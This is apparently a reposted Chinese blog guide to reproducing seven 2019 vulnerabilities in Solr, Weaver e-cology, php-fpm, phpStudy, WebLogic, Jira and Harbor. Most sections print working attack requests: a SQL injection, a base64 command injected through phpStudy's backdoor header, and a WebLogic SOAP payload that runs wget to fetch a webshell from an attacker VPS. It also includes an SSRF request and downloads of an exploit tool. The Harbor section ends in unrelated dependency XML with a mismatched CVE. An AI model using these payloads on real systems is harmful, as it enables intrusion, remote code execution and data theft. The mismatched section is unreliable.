近期重要漏洞攻击验证情况
一、 Apache Solr Velocity TemplateCVE-2019-0193-RCE
验证描述
Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
Apache Solr基于Velocity模板存在远程命令执行漏洞。该漏洞是由于Velocity模板存在注入所致。攻击者可利用漏洞访问Solr服务器上Core名称,先把params.resource.loader.enabled设置为true(就可加载指定资源),在服务器执行命令。
验证信息
注:以上验证信息(方法)可能带有攻击性,仅供安全研究之用。请广大用户加强对漏洞的防范工作,尽快下载相关补丁。
二、 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞
验证描述
泛微e-cology OA 系统的前台接口WorkflowCenterTreeData 在使用 Oracle 数据库时存在未授权 SQL 注入漏洞。
验证信息
1.测试时要注意是否有授权
2.漏洞点在
/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333
3.所使用的POC如下:
POST
/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333
HTTP/1.1 Host: xxxxx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Connection: close Cookie: testBanCookie=test; JSESSIONID=abcPFN5zZe8gbgbso7i3w; ecology_JSessionId=abcPFN5zZe8gbgbso7i3w Upgrade-Insecure-Requests: 1 Content-Length: 2238 formids=11111111111))) 0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
三、php-fpm (CVE-2019-11043)漏洞
验证描述
来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。
当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。
当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大。
验证信息
下载攻击脚本
go get github.com/neex/phuip-fpizdam # 默认下载之后会保存到前面
配置的go 的工作目录
配置docker 靶机
git clone https://github.com/neex/phuip-fpizdam.git
cd reproducer/
docker build -t reproduce-cve-2019-11043 . # 注意后面有个点
docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043 # 运行靶机
靶机运行之后查看是否运行正常
靶机运行正常,利用poc 工具攻击靶机 验证服务器有漏洞的输出界面
第二次重新运行脚本,脚本会一直向服务器发包,这时在浏览器打开靶机地址,直接执行命令即可(url如下要多试几次才可以)
http://192.168.124.141:8080/script.php?a=id
利用成功结果如图
四、PhpStuday后门
验证描述
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无 需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户,9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章,文章里说明phpstudy存在“后门”。
验证信息
启动漏洞版本对应的版本
成功启动环境
拦截数据包,添加如下的请求头字段:
Accept-Encoding中逗号后面的空格要去掉
Accept-Encoding: gzip,deflate
Accept-Charset为echo system(‘whoami‘)的base64编码
Accept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
完整数据包利用的payload
GET / HTTP/1.1 Host: 10.211.55.3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Charset: 您添加的base64加密的执行语句 Accept-Language: zh-CN,zh;q=0.9 Connection: close
执行whoami相关回显
尝试ipconfig
python验证脚本截图:
五、 Weblogic高危漏洞复现 CVE-2019-2890
验证描述
WebLogic 是 Oracle 公司出品的基于 JavaEE 架构的中间件,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用。
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。
由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
验证信息
linux下weblogic10.3.6复现
1.环境搭建
Weblogic10.3.6环境搭建参考:
https://blog.csdn.net/qq_27298687/article/details/82767247
2.漏洞路径
访问http://ip:port/_async/AsyncResponseService出现如下页面,可能存在该漏洞。
3.上传webshell
首先在公网vps中放如webshell,这里用weblogic.txt代替,内容为“hello word!!!”
然后使用burpsuite重放如下报文
POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.37.128:7001Content-Length: 859Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
六、Jira未授权SSRF漏洞复现
验证描述
Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。
docker进行搭建,下载地址:
docker pull cptactionhank/atlassian-jira:7.8.0
环境启动:
docker run --detach
--publish 8080:8080cptactionhank/atlassian-jira:7.8.0
验证信息
- http://yourip:8080访问安装(选择第二个安装)
下一步:
下一步:(PS:需要生成使用许可)
下一步:
下一步,至此安装完成。
2.访问:
http://192.168.100.128:8080/secure/Dashboard.jspa进行抓包,替换POC,得到以下信息,说明漏洞存在。
在http://ceye.io/records/dns中可看到有NDS流量记录。
1.搭建环境时注意要申请使用许可
2.学海(安全圈)无涯苦作舟。
3.漏洞点在/plugins/servlet/gadgets/makeRequest
4.漏洞参考:
https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A
5.所使用的POC如下:
GET/plugins/servlet/gadgets/makeRequest?url=http://192.168.100.128:[email protected]/1.1
Host:192.168.100.128:8080
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip, deflate
Connection: close
Referer: http://192.168.100.128:8080/secure/Dashboard.jspa
X-Atlassian-Token:no-check
Upgrade-Insecure-Requests:1
Cache-Control:max-age=0
七、CVE-2019-1609 Harbor任意管理员注册漏洞
验证描述
Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。Harbor支持安装在多个Registry节点的镜像资源复制,镜像全部保存在私有Registry中, 确保数据和知识产权在公司内部网络中管控。
验证信息
1、安装docker
安装docker有很多问题可以查看这个
https://www.cnblogs.com/yufeng218/p/8370670.html
测试是否安装成功
- 2. 下载并安装harbor
1、Wgethttps://storage.googleapis.com/harbor-releases/release-1.8.0/harbor-online-installer-v1.8.1.tgz
2、tarxvf harbor-online-installer-v1.8.0.tgz
修改hostname为安装Harbor机器的IP地址
1、cd harbor
2、vi harbor.yml
安装harbor,
1、./install.sh
访问地址就能进入harbor后台。
使用admin账户登陆后发现已经成功写入帐号(admin账户密码在配置文件harbor.yml查看),并且为管理员权限。
poc地址https://github.com/dacade/cve-2019-16097
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.8</version>
</dependency>
<!--https://mvnrepository.com/artifact/ch.qos.logback/logback-core -->
<dependency>
<groupId>ch.qos.logback</groupId>
<artifactId>logback-core</artifactId>
<version>1.3.0-alpha4</version>
</dependency>
<!--https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
<scope>compile</scope>
</dependency>
原文地址:https://www.cnblogs.com/suiyujunshu/p/11819129.html